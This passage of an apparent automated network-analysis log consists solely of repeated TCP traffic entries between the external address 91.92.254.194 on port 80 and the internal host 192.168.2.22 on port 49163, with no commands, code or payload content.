                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.254.194:80
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 91.92.254.194:80 -> 192.168.2.22:49163
